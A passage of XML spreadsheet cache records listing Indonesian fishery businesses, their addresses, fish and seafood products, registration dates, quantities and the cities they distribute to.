    <s v="Ikan Pelagis Beku (Lemuru, Tongkol, Deho, Kembung, Semar, Layang, Cakalang)"/>
    <d v="2020-09-16T00:00:00"/>
    <n v="800000"/>
    <s v="Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Trenggalek, Kabupaten Tulungagung, Kota Surabaya"/>
    <m/>
  </r>
  <r>
    <n v="20426"/>
    <x v="394"/>
    <s v="CV. A TIGA"/>
    <s v="Jl.Jamaker, RT.26, Kelurahan Nunukan Barat, Kec,Nunukan, Kab.Nunukan&lt;br&gt;Kalimantan Utara"/>
    <n v="24"/>
    <s v="Ikan Demersal Beku (Cumi-cumi)"/>
    <d v="2020-07-28T00:00:00"/>
    <n v="0"/>
    <s v="Kabupaten Malinau, Kabupaten Bulungan, Kabupaten Tana Tidung, Kabupaten Nunukan, Kota Tarakan"/>
    <m/>
  </r>
  <r>
    <n v="20427"/>
    <x v="394"/>
    <s v="CV. A TIGA"/>
    <s v="Jl.Jamaker, RT.26, Kelurahan Nunukan Barat, Kec,Nunukan, Kab.Nunukan&lt;br&gt;Kalimantan Utara"/>
    <n v="24"/>
    <s v="Ikan Pelagis Utuh Beku (Tongkol, Kembung, Layang)"/>
    <d v="2020-07-28T00:00:00"/>
    <n v="0"/>
    <s v="Kabupaten Malinau, Kabupaten Bulungan, Kabupaten Tana Tidung, Kabupaten Nunukan, Kota Tarakan"/>
    <m/>
  </r>
  <r>
    <n v="19449"/>
    <x v="309"/>
    <s v="PT. RUBELLI INDONESIA"/>
    <s v="Taman Pergudangan dan Perkantoran Blok C8, Jl. Muara Baru Raya No. 30 Kp. Luar Batang, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Salmon Beku"/>
    <d v="2020-09-29T00:00:00"/>
    <n v="25000"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Utara, Kota Bekasi, Kota Tangerang"/>
    <m/>
  </r>
  <r>
    <n v="21234"/>
    <x v="370"/>
    <s v="PT. MAJU MINA LAUT INDONESIA"/>
    <s v="Jl. Husein Sastranegara No.109 RT 003 RW 010 Room 09, Kel. Benda, Kec. Benda, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Ikan Demersal Beku (Kod, Sebelah, Monkfish, Kakap, Seabass, Barramundi)"/>
    <d v="2020-07-03T00:00:00"/>
    <n v="300000"/>
    <s v="Kota Medan, Kota Jakarta Utara, Kota Sukabumi, Kota Bandung, Kota Surabaya, Kota Denpasar"/>
    <m/>
  </r>
  <r>
    <n v="19258"/>
    <x v="384"/>
    <s v="PT. SHINMAS JAYA BAHARI"/>
    <s v="Jl. Margomulyo No.44 Komplek Suri Mulia Blok H-17, Kel. Asemrowo, Kec. Tambak Sari Oso, Kota Surabaya&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Pelagis Beku (Tongkol, Gabus Laut, Tembang, Marlin, Layaran, Layang, Cakalang, Tenggiri)"/>
    <d v="2020-04-08T00:00:00"/>
    <n v="20000"/>
    <s v="Kota Jakarta Timur, Kabupaten Pasuruan, Kabupaten Gresik, Kota Surabaya, Kota Makassar"/>
    <m/>
  </r>
  <r>
    <n v="19261"/>
    <x v="384"/>
    <s v="PT. SHINMAS JAYA BAHARI"/>
    <s v="Jl. Margomulyo No.44 Komplek Suri Mulia Blok H-17, Kel. Asemrowo, Kec. Tambak Sari Oso, Kota Surabaya&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2020-04-08T00:00:00"/>
    <n v="10000"/>
    <s v="Kota Jakarta Timur, Kabupaten Lamongan, Kabupaten Gresik, Kota Surabaya, Kota Makassar"/>
    <m/>
  </r>
  <r>
    <n v="20684"/>
    <x v="386"/>
    <s v="UD. SBY CORPORATION"/>
    <s v="Jl. Hayam Wuruk No. 1 RT 03 RW 05, Kel. Sukodadi, Kec. Sukodadi, Kabupaten Lamongan&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Abon Ikan"/>
    <d v="2020-09-10T00:00:00"/>
    <n v="2400"/>
    <s v="Kabupaten Tuban, Kabupaten Lamongan, Kabupaten Gresik, Kota Pasuruan, Kota Surabaya"/>
    <m/>
  </r>
  <r>
    <n v="21122"/>
    <x v="395"/>
    <s v="CITRA RASA"/>
    <s v="Klaci II RT 004 RW 011, Kel. Margoluwih, Kec. Seyegan, Kabupaten Sleman&lt;br&gt;Daerah Istimewa Yogyakarta"/>
    <n v="15"/>
    <s v="Keripik Belut"/>
    <d v="2020-08-12T00:00:00"/>
    <n v="800"/>
    <s v="Kota Jakarta Pusat, Kota Semarang, Kabupaten Sleman, Kota Yogyakarta, Kota Surabaya"/>
    <m/>
  </r>
  <r>
    <n v="21123"/>
    <x v="395"/>
    <s v="CITRA RASA"/>
    <s v="Klaci II RT 004 RW 011, Kel. Margoluwih, Kec. Seyegan, Kabupaten Sleman&lt;br&gt;Daerah Istimewa Yogyakarta"/>
    <n v="15"/>
    <s v="Keripik Wader"/>
    <d v="2020-08-12T00:00:00"/>
    <n v="800"/>
    <s v="Kota Jakarta Pusat, Kota Semarang, Kabupaten Sleman, Kota Yogyakarta, Kota Surabaya"/>
    <m/>
  </r>
  <r>
    <n v="17163"/>
    <x v="396"/>
    <s v="UD. FAMILY FOOD"/>
    <s v="Ds Tenaru RT 11 RW 4, Kel. Tenaru, Kec. Driyorejo, Kabupaten Gresik&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Produk Perikanan Bernilai Tambah Beku (Siomay Udang, Nugget Udang, Hakau Udang, Pastel Udang Ekor)"/>
    <d v="2020-07-22T00:00:00"/>
    <n v="78000"/>
    <s v="Kabupaten Kediri, Kabupaten Jombang, Kabupaten Gresik, Kota Malang, Kota Denpasar"/>
    <m/>
  </r>
  <r>
    <n v="21102"/>
    <x v="397"/>
    <s v="PT. HAE DONG JAYA ABADI"/>
    <s v="Margomulyo Permai Blok H5, Kel. Tambak Sarioso, Kec. Asemrowo, Kota Surabaya&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Demersal Beku (Barakuda, Barramundi, Lencam, Senangin, Manyung, Kuwe, Angoli, Kerapu, Kakatua, Bawal)"/>
    <d v="2020-09-07T00:00:00"/>
    <n v="1000"/>
    <s v="Kabupaten Probolinggo, Kabupaten Lamongan, Kabupaten Bangkalan, Kota Surabaya"/>
    <m/>
  </r>
  <r>
    <n v="21103"/>
    <x v="397"/>
    <s v="PT. HAE DONG JAYA ABADI"/>
    <s v="Margomulyo Permai Blok H5, Kel. Tambak Sarioso, Kec. Asemrowo, Kota Surabaya&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Scombroid Beku"/>
    <d v="2020-09-07T00:00:00"/>
    <n v="1000"/>
    <s v="Kabupaten Probolinggo, Kabupaten Lamongan, Kabupaten Bangkalan, Kota Surabaya"/>
    <m/>
  </r>
  <r>
    <n v="21104"/>
    <x v="397"/>
    <s v="PT. HAE DONG JAYA ABADI"/>
    <s v="Margomulyo Permai Blok H5, Kel. Tambak Sarioso, Kec. Asemrowo, Kota Surabaya&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Hasil Budidaya Beku (Bandeng, Patin, Nila)"/>
    <d v="2020-09-07T00:00:00"/>
    <n v="0"/>
    <s v="Kabupaten Probolinggo, Kabupaten Lamongan, Kabupaten Bangkalan, Kota Surabaya"/>
    <m/>
  </r>
  <r>
    <n v="21228"/>
    <x v="379"/>
    <s v="CV. FIRDALI SEJAHTERA"/>
    <s v="Jl. Husein Sastranegara No.109 RT 003 RW 010 Room 07, Kel. Benda, Kec. Benda, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Ikan Demersal Beku (Kod, Sebelah, Kerapu, Monkfish, Kakap, Seabass, Barramundi)"/>
    <d v="2020-07-03T00:00:00"/>
    <n v="300000"/>
    <s v="Kota Medan, Kota Jakarta Utara, Kota Bandung, Kota Surabaya, Kota Denpasar"/>
    <m/>
  </r>
  <r>
    <n v="20850"/>
    <x v="398"/>
    <s v="PT. GEMA MANGGALA CHEMINDO"/>
    <s v="Pergudangan Biz Point Blok Hokkaido No.60, Jl. Raya Pemda Tigaraksa, Kel. Sukamulya, Kec. Cikupa, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Minyak Ikan"/>
    <d v="2020-06-30T00:00:00"/>
    <n v="0"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Depok, Kabupaten Tangerang"/>
    <m/>
  </r>
  <r>
    <n v="19447"/>
    <x v="309"/>
    <s v="PT. RUBELLI INDONESIA"/>
    <s v="Taman Pergudangan dan Perkantoran Blok C8, Jl. Muara Baru Raya No. 30 Kp. Luar Batang, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Demersal Beku (Gulama, Kerapu, Kakap Merah, Kuro)"/>
    <d v="2020-09-29T00:00:00"/>
    <n v="50000"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Utara, Kota Bekasi, Kota Tangerang"/>
    <m/>
  </r>
  <r>
    <n v="19448"/>
    <x v="309"/>
    <s v="PT. RUBELLI INDONESIA"/>
    <s v="Taman Pergudangan dan Perkantoran Blok C8, Jl. Muara Baru Raya No. 30 Kp. Luar Batang, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2020-09-29T00:00:00"/>
    <n v="50000"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Utara, Kota Bekasi, Kota Tangerang"/>
    <m/>
  </r>
  <r>
    <n v="19451"/>
    <x v="309"/>
    <s v="PT. RUBELLI INDONESIA"/>
    <s v="Taman Pergudangan dan Perkantoran Blok C8, Jl. Muara Baru Raya No. 30 Kp. Luar Batang, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Daging Tuna Beku"/>
    <d v="2020-09-29T00:00:00"/>
    <n v="50000"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Utara, Kota Bekasi, Kota Tangerang"/>
    <m/>
  </r>
  <r>
    <n v="21088"/>
    <x v="399"/>
    <s v="MAWAR LESTARI"/>
    <s v="Jl. Moch Roem RT 03, Kel. Bontang Lestari, Kec. Bontang Selatan, Kota Bontang&lt;br&gt;Kalimantan Timur"/>
    <n v="23"/>
    <s v="Snack Ikan"/>
    <d v="2020-08-25T00:00:00"/>
    <n v="240"/>
    <s v="Kabupaten Kutai Timur, Kota Balikpapan, Kota Samarinda, Kota Bontang"/>
    <m/>
  </r>
  <r>
    <n v="21089"/>
    <x v="399"/>
    <s v="MAWAR LESTARI"/>
    <s v="Jl. Moch Roem RT 03, Kel. Bontang Lestari, Kec. Bontang Selatan, Kota Bontang&lt;br&gt;Kalimantan Timur"/>
    <n v="23"/>
    <s v="Abon Ikan"/>
    <d v="2020-08-25T00:00:00"/>
    <n v="120"/>
    <s v="Kabupaten Kutai Timur, Kota Balikpapan, Kota Samarinda, Kota Bontang"/>
    <m/>
  </r>
  <r>
    <n v="21389"/>
    <x v="400"/>
    <s v="PT. PUSPITA ANUGERAH ABADI"/>
    <s v="Komplek Tempat Pelelangan Ikan (TPI) Unit 2 RT 03 RW 03, Kel. Bendar, Kec. Juwana, Kabupaten Pati&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Ikan Pelagis Beku (Tongkol, Sero, Layang, Salem)"/>
    <d v="2021-01-04T00:00:00"/>
    <n v="60000000"/>
    <s v="Kabupaten Rembang, Kabupaten Pati, Kabupaten Jepara, Kabupaten Demak"/>
    <m/>
  </r>
  <r>
    <n v="20293"/>
    <x v="401"/>
    <s v="PT. KELOLA MINA LAUT UNIT LUWUK"/>
    <s v="Jl. Raya - Luwuk Biak Km 8, Kel. Boyou, Kec. Luwuk Utara, Kabupaten Banggai&lt;br&gt;Sulawesi Tengah"/>
    <n v="28"/>
    <s v="Ikan Pelagis Beku (Tongkol, Deho, Malalugis, Layang, Cakalang, Tenggiri)"/>
    <d v="2020-05-08T00:00:00"/>
    <n v="70000"/>
    <s v="Kota Jakarta Utara, Kabupaten Gresik, Kota Surabaya, Kota Makassar"/>
    <m/>
  </r>
  <r>
    <n v="20694"/>
    <x v="402"/>
    <s v="MINA MANDIRI"/>
    <s v="Bokesan, Kel. Sindumartani, Kec. Ngemplak, Kabupaten Sleman&lt;br&gt;Daerah Istimewa Yogyakarta"/>
    <n v="15"/>
    <s v="Abon Lele, Abon Nila"/>
    <d v="2020-08-03T00:00:00"/>
    <n v="600"/>
    <s v="Kota Jakarta Pusat, Kota Semarang, Kota Yogyakarta, Kota Surabaya"/>
    <m/>
  </r>
  <r>
    <n v="20695"/>
    <x v="402"/>
    <s v="MINA MANDIRI"/>
    <s v="Bokesan, Kel. Sindumartani, Kec. Ngemplak, Kabupaten Sleman&lt;br&gt;Daerah Istimewa Yogyakarta"/>
    <n v="15"/>
    <s v="Nila Krispy"/>
    <d v="2020-08-03T00:00:00"/>
    <n v="600"/>
    <s v="Kota Jakarta Pusat, Kota Semarang, Kota Yogyakarta, Kota Surabaya"/>
    <m/>
  </r>
  <r>
    <n v="20603"/>
    <x v="389"/>
    <s v="PT. DKSH INDONESIA"/>
    <s v="IDS DSC MED Center Jln. Jawa Blok A1 MM2100 Industrial Estate Cibitung, Desa Mekarwangi, Kec. Cikarang Barat, Kabupaten Bekasi&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Tepung Agar-agar"/>
    <d v="2020-09-29T00:00:00"/>
    <n v="0"/>
    <s v="Kabupaten Bekasi, Kota Bogor, Kota Surabaya, Kabupaten Tangerang"/>
    <m/>
  </r>
  <r>
    <n v="21204"/>
    <x v="403"/>
    <s v="PT, SAMUDERA PANGAN INDONESIA"/>
    <s v="Jl, Tuna Raya No,5, Muara Baru Ujung, PPS Nizam Zachman, Kel, Penjaringan, Kec, Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Cephalopoda Segar (Cumi-cumi)"/>
    <d v="2020-07-16T00:00:00"/>
    <s v="03/01/1900  17,48,00"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Utara, Kota Tangerang Selatan"/>
    <m/>
  </r>
  <r>
    <n v="21205"/>
    <x v="403"/>
    <s v="PT. SAMUDERA PANGAN INDONESIA"/>
    <s v="Jl. Tuna Raya No. 5, Muara Baru Ujung, PPS Nizam Zachman, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Udang Segar"/>
    <d v="2020-07-20T00:00:00"/>
    <n v="21"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Utara, Kota Tangerang Selatan"/>
    <m/>
  </r>
  <r>
    <n v="21206"/>
    <x v="403"/>
    <s v="PT. SAMUDERA PANGAN INDONESIA"/>
    <s v="Jl. Tuna Raya No. 5, Muara Baru Ujung, PPS Nizam Zachman, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Kepiting Segar"/>
    <d v="2020-07-20T00:00:00"/>
    <n v="0"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Utara, Kota Tangerang Selatan"/>
    <m/>
  </r>
  <r>
    <n v="21207"/>
    <x v="403"/>
    <s v="PT, SAMUDERA PANGAN INDONESIA"/>
    <s v="Jl, Tuna Raya No, 5, Muara Baru Ujung, PPS Nizam Zachman, Kel, Penjaringan, Kec, Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Demersal Segar (Alfonsino, Broadbanded Thornyhead, Kerapu, Gerot-gerot, Halibut, Red Sea Bream, Kakap, Trout)"/>
    <d v="2020-07-20T00:00:00"/>
    <n v="33282.32"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Utara, Kota Tangerang Selatan"/>
    <m/>
  </r>
  <r>
    <n v="21208"/>
    <x v="403"/>
    <s v="PT, SAMUDERA PANGAN INDONESIA"/>
    <s v="Jl, Tuna Raya No, 5, Muara Baru Ujung, PPS Nizam Zachman, Kel, Penjaringan, Kec, Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Telur Ikan Segar"/>
    <d v="2020-07-20T00:00:00"/>
    <s v="01/01/1900  18,05,00"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Utara, Kota Tangerang Selatan"/>
    <m/>
  </r>
  <r>
    <n v="21209"/>
    <x v="403"/>
    <s v="PT, SAMUDERA PANGAN INDONESIA"/>
    <s v="Jl, Tuna Raya No, 5, Muara Baru Ujung, PPS Nizam Zachman, Kel, Penjaringan, Kec, Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Pelagis Segar (Tuna, Amberjack, Makerel Atlantik, Salem, Sauri Pasifik, Philcard, Pedang, Ekor Kuning)"/>
    <d v="2020-07-20T00:00:00"/>
    <s v="04/04/1900  15,11,00"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Utara, Kota Tangerang Selatan"/>
    <m/>
  </r>
  <r>
    <n v="21210"/>
    <x v="403"/>
    <s v="PT, SAMUDERA PANGAN INDONESIA"/>
    <s v="Jl, Tuna Raya No, 5, Muara Baru Ujung, PPS Nizam Zachman, Kel, Penjaringan, Kec, Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Salmon Segar"/>
    <d v="2020-07-20T00:00:00"/>
    <s v="09/04/1900  17,06,00"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Utara, Kota Tangerang Selatan"/>
    <m/>
  </r>
  <r>
    <n v="21211"/>
    <x v="403"/>
    <s v="PT, SAMUDERA PANGAN INDONESIA"/>
    <s v="Jl, Tuna Raya No, 5, Muara Baru Ujung, PPS Nizam Zachman, Kel, Penjaringan, Kec, Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Bulu Babi Segar"/>
    <d v="2020-07-21T00:00:00"/>
    <n v="224.65"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Utara, Kota Tangerang Selatan"/>
    <m/>
  </r>
  <r>
    <n v="21212"/>
    <x v="403"/>
    <s v="PT, SAMUDERA PANGAN INDONESIA"/>
    <s v="Jl, Tuna Raya No, 5, Muara Baru Ujung, PPS Nizam Zachman, Kel, Penjaringan, Kec, Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Kerang Segar"/>
    <d v="2020-07-20T00:00:00"/>
    <n v="1691.98"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Utara, Kota Tangerang Selatan"/>
    <m/>
  </r>
  <r>
    <n v="21213"/>
    <x v="403"/>
    <s v="PT. SAMUDERA PANGAN INDONESIA"/>
    <s v="Jl. Tuna Raya No. 5, Muara Baru Ujung, PPS Nizam Zachman, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Tuna Segar"/>
    <d v="2020-07-20T00:00:00"/>
    <n v="0"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Utara, Kota Tangerang Selatan"/>
    <m/>
  </r>
  <r>
    <n v="21214"/>
    <x v="403"/>
    <s v="PT. SAMUDERA PANGAN INDONESIA"/>
    <s v="Jl. Tuna Raya No. 5, Muara Baru Ujung, PPS Nizam Zachman, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Cephalopoda Beku (Cumi-cumi)"/>
    <d v="2020-07-20T00:00:00"/>
    <n v="0"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Utara, Kota Tangerang Selatan"/>
    <m/>
  </r>
  <r>
    <n v="21215"/>
    <x v="403"/>
    <s v="PT. SAMUDERA PANGAN INDONESIA"/>
    <s v="Jl. Tuna Raya No.5, Muara Baru Ujung, PPS Nizam Zachman, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Udang Beku"/>
    <d v="2020-07-16T00:00:00"/>
    <n v="0"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Utara, Kota Tangerang Selatan"/>
    <m/>
  </r>
  <r>
    <n v="21217"/>
    <x v="403"/>
    <s v="PT. SAMUDERA PANGAN INDONESIA"/>
    <s v="Jl. Tuna Raya No.5, Muara Baru Ujung, PPS Nizam Zachman, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Demersal Beku (Alfonsino, Broadbanded Thornyhead, Sebelah, Kerapu, Gerot-gerot, Red Sea Bream, Kakap Merah, Kakap, Trout)"/>
    <d v="2020-07-16T00:00:00"/>
    <n v="0"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Utara, Kota Tangerang Selatan"/>
    <m/>
  </r>
  <r>
    <n v="21218"/>
    <x v="403"/>
    <s v="PT. SAMUDERA PANGAN INDONESIA"/>
    <s v="Jl. Tuna Raya No.5, Muara Baru Ujung, PPS Nizam Zachman, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Asap Beku"/>
    <d v="2020-07-16T00:00:00"/>
    <n v="0"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Utara, Kota Tangerang Selatan"/>
    <m/>
  </r>
  <r>
    <n v="21219"/>
    <x v="403"/>
    <s v="PT. SAMUDERA PANGAN INDONESIA"/>
    <s v="Jl. Tuna Raya No.5, Muara Baru Ujung, PPS Nizam Zachman, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Bulu Babi Beku"/>
    <d v="2020-07-16T00:00:00"/>
    <n v="0"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Utara, Kota Tangerang Selatan"/>
    <m/>
  </r>
  <r>
    <n v="21220"/>
    <x v="403"/>
    <s v="PT. SAMUDERA PANGAN INDONESIA"/>
    <s v="Jl. Tuna Raya No.5, Muara Baru Ujung, PPS Nizam Zachman, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Pelagis Beku (Amberjack, Makerel Atlantik, Kembung, Salem, Pacific Saury, Philcard, Pedang, Ekor Kuning)"/>
    <d v="2020-07-16T00:00:00"/>
    <n v="0"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Utara, Kota Tangerang Selatan"/>
    <m/>
  </r>
  <r>
    <n v="21221"/>
    <x v="403"/>
    <s v="PT. SAMUDERA PANGAN INDONESIA"/>
    <s v="Jl. Tuna Raya No.5, Muara Baru Ujung, PPS Nizam Zachman, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Telur Ikan Beku"/>
    <d v="2020-07-16T00:00:00"/>
    <n v="0"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Utara, Kota Tangerang Selatan"/>
    <m/>
  </r>
  <r>
    <n v="20605"/>
    <x v="389"/>
    <s v="PT. DKSH INDONESIA"/>
    <s v="IDS DSC MED Center Jln. Jawa Blok A1 MM2100 Industrial Estate Cibitung, Desa Mekarwangi, Kec. Cikarang Barat, Kabupaten Bekasi&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Tepung Alginat"/>
    <d v="2020-09-29T00:00:00"/>
    <n v="0"/>
    <s v="Kota Jakarta Timur, Kabupaten Bekasi, Kota Bogor, Kota Surabaya"/>
    <m/>
  </r>
  <r>
    <n v="20565"/>
    <x v="376"/>
    <s v="CV. CINDY GROUP INDONESIA"/>
    <s v="Gedung Olahan Sentra Minapolitan, Jl. H. Usa No.12A, Kel. Ciseeng, Kec. Ciseeng, Kabupaten Bogor&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Ikan Pindang"/>
    <d v="2020-12-21T00:00:00"/>
    <n v="1200"/>
    <s v="Kota Jakarta Selatan, Kabupaten Bogor, Kota Bogor, Kota Depok"/>
    <m/>
  </r>
  <r>
    <n v="20291"/>
    <x v="401"/>
    <s v="PT. KELOLA MINA LAUT UNIT LUWUK"/>
    <s v="Jl. Raya - Luwuk Biak Km 8, Kel. Boyou, Kec. Luwuk Utara, Kabupaten Banggai&lt;br&gt;Sulawesi Tengah"/>
    <n v="28"/>
    <s v="Udang Beku"/>
    <d v="2020-05-08T00:00:00"/>
    <n v="50000"/>
    <s v="Kabupaten Gresik, Kota Surabaya, Kota Makassar, Kota Kendari"/>
    <m/>
  </r>
  <r>
    <n v="20292"/>
    <x v="401"/>
    <s v="PT. KELOLA MINA LAUT UNIT LUWUK"/>
    <s v="Jl. Raya - Luwuk Biak Km 8, Kel. Boyou, Kec. Luwuk Utara, Kabupaten Banggai&lt;br&gt;Sulawesi Tengah"/>
    <n v="28"/>
    <s v="Ikan Demersal Beku (Katamba, Kerapu, Kakatua, Merah, Kakap)"/>
    <d v="2020-05-08T00:00:00"/>
    <n v="60000"/>
    <s v="Kabupaten Gresik, Kota Surabaya, Kota Makassar, Kota Kendari"/>
    <m/>
  </r>
  <r>
    <n v="21390"/>
    <x v="404"/>
    <s v="SINAR TERANG"/>
    <s v="Jl. M. Said Gg. Polewali, Kel. Lok Bahu, Kec. Sungai Kunjang, Kota Samarinda&lt;br&gt;Kalimantan Timur"/>
    <n v="23"/>
    <s v="Amplang Ikan"/>
    <d v="2020-08-28T00:00:00"/>
    <n v="2400"/>
    <s v="Kabupaten Kutai Kartanegara, Kota Balikpapan, Kota Samarinda"/>
    <m/>
  </r>
  <r>
    <n v="20441"/>
    <x v="405"/>
    <s v="RIZKI BERSAMA JAYA"/>
    <s v="Kp. Cisemplak RT 003 RW 006, Kel. Wangunreja, Kec. Nyalindung, Kabupaten Sukabumi&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Produk Perikanan Bernilai Tambah Beku (Kaki Naga, Siomay Ikan, Ekado, Minikado, Tekado)"/>
    <d v="2020-11-20T00:00:00"/>
    <n v="420000"/>
    <s v="Kabupaten Sukabumi, Kota Bogor, Kota Sukabumi, Kota Bandung"/>
    <m/>
  </r>
  <r>
    <n v="21336"/>
    <x v="59"/>
    <s v="PT. SATYA TRINADI KOMIRA PERKASA"/>
    <s v="Komplek Pergudangan Kosambi Permai Blok. KK19 Desa Jatimulya Kab. Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Salmon Segar"/>
    <d v="2020-07-22T00:00:00"/>
    <n v="1000"/>
    <s v="Kota Jakarta Timur, Kota Jakarta Utara, Kabupaten Tangerang"/>
    <m/>
  </r>
  <r>
    <n v="20948"/>
    <x v="361"/>
    <s v="CV. ANUGRAH ANDALAN NELAYAN"/>
    <s v="Kawasan Pelabuhan Muara Angke No.25, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Pelagis Beku (Lemuru, Tongkol, Tembang, Kembung, Japuh, Selar, Layang, Gabus, Tenggiri)"/>
    <d v="2020-08-03T00:00:00"/>
    <n v="350"/>
    <s v="Kota Jambi, Kota Palembang, Kota Jakarta Utara, Kota Tegal"/>
    <m/>
  </r>
  <r>
    <n v="20949"/>
    <x v="361"/>
    <s v="CV. ANUGRAH ANDALAN NELAYAN"/>
    <s v="Kawasan Pelabuhan Muara Angke No.25, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Demersal Beku (Kuwe, Layur, Bawal, Talang-talang, Kakap)"/>
    <d v="2020-08-03T00:00:00"/>
    <n v="350"/>
    <s v="Kota Jambi, Kota Palembang, Kota Jakarta Utara, Kota Tegal"/>
    <m/>
  </r>
  <r>
    <n v="20580"/>
    <x v="406"/>
    <s v="PT. HALAL INTERNUSA MEGA"/>
    <s v="Kawasan Industri dan Pergudangan Marunda Center Blok Q2 No.23A, Jl. Marunda Makmur, Kel. Segaramakmur, Kec. Tarumanegara, Kabupaten Bekasi&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Teri Kering"/>
    <d v="2020-06-16T00:00:00"/>
    <n v="1000"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Utara, Kabupaten Bogor"/>
    <m/>
  </r>
  <r>
    <n v="20581"/>
    <x v="406"/>
    <s v="PT. HALAL INTERNUSA MEGA"/>
    <s v="Kawasan Industri dan Pergudangan Marunda Center Blok Q2 No.23A, Jl. Marunda Makmur, Kel. Segaramakmur, Kec. Tarumanegara, Kabupaten Bekasi&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Ikan Pelagis Beku (Alaska Pollock, Salem)"/>
    <d v="2020-06-16T00:00:00"/>
    <n v="1000"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Utara, Kabupaten Bogor"/>
    <m/>
  </r>
  <r>
    <n v="20582"/>
    <x v="406"/>
